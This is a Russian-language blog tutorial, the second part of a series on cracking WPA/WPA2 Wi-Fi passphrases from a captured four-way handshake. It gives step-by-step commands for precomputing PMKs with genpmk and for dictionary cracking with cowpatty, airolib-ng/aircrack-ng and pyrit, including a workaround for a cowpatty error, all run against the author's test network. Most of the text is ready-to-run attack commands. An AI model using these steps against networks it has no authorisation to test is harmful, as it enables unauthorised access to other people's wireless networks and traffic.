В предыдущей статье (Взлом Wi-Fi сети WPA/WPA2 – перехват handshake – часть 1) было рассказано, как перехватитьhandshake и подобрать парольную фразу + мы поговорили о теории, что не мало важно! Это был простой пример. Теперь же, давайте немного усложним задачу. Усложним задачу только тем, что в этой статье мы познакомимся с такими программами как: genpmk, cowpatty, airolib-ng и pyrit. И научимся их использовать.
Писать снова о теории и как перехватить handshake наверное смысла нет. Поэтому, в случае чего, обратитесь к первой части.
Итак, у нас есть handshake и мы можем приступать к “новому” материалу.
genpmk & cowpatty
Прежде чем начинать, еще раз напомню, что нам нужен словарь, в котором должна находиться парольная фраза. В моем случае это “helloitismypass“.
Для быстрого взлома мы можем заранее рассчитать (pre-calculate) PMK для конкретной SSID. Следующая команда создаст файл PMK-Wireless, который будет содержать предварительно сгенерированный (pre-generated) PMK:
# genpmk -f mypass.lst -d PMK-Wireless -s TestWireless
- -f – путь к словарю
- -d – PMK-файл
- -s — название (SSID) точки доступа (AP)
PMK-файл создан, теперь будем использовать cowpatty для взлома WPA пароля.
Для справки: эксперимент проводил на BackTrack 5 R3, в котором предустановленна cowpatty v4.6. Так вот, если задать команду:
# cowpatty -d PMK-Wireless -r handshaketest-01.cap -s TestWireless
…выдается ошибка “end of pcap capture file incomplete four-way handshake exchange“.
Решение было найдено здесь. В котором сказано, что нужно добавить опцию -2, после чего все будет работать нормально:
# cowpatty -2 -d PMK-Wireless -r handshaketest-01.cap -s TestWireless
- -d – созданный PMK-файл (см. команду genpmk)
- -r – “захваченный” handshake
- -s – название (SSID) точки доступа (AP)
Пароль получен! Обратите внимание за какое время cowpatty подобрал пароль = 0.32 секунды.
airolib-ng & aircrack-ng
Теперь тоже самое, но с другими программами.
Для того чтобы использовать PMK-файл с aircrack-ng, нам нужно воспользоваться программой airolib-ng. Для этого зададим след. команду:
# airolib-ng PMK-Aircrack --import cowpatty PMK-Wireless
- PMK-Aircrack – база данных, совместимая для работы с aircrack-ng
- PMK-Wireless – PMK-файл, который мы создали с помощью genpmk
“Скормим” созданную БД (PMK-Aircrack) aircrack-ng. После чего процесс взлома будет существенно выше:
# aircrack-ng -r PMK-Aircrack PMK-Wireless
- -r – база данных, совместимая для работы с aircrack-ng
- PMK-Wireless — PMK-файл, который мы создали с помощью genpmk
Готово.
Pyrit
Pyrit может использовать многопроцессорные системы (multi-CPU) для быстрого взлома. Более подробную информацию ищите на официальном сайте.
# pyrit -r handshaketest-01.cap -i PMK-Wireless attack_cowpatty
Вот и все! Ничего сложного.
3 comments On Взлом Wi-Fi сети WPA/WPA2 – перехват handshake – часть 2
Pingback: Wifiphisher инструмент для фишинговых атак в wi-fi сетях. - cryptoworld ()
Pingback: Геолокация по WI-FI. - Cryptoworld ()
Pingback: WIFITE V2 инструмент для взлома Wi-Fi сетей. - Cryptoworld ()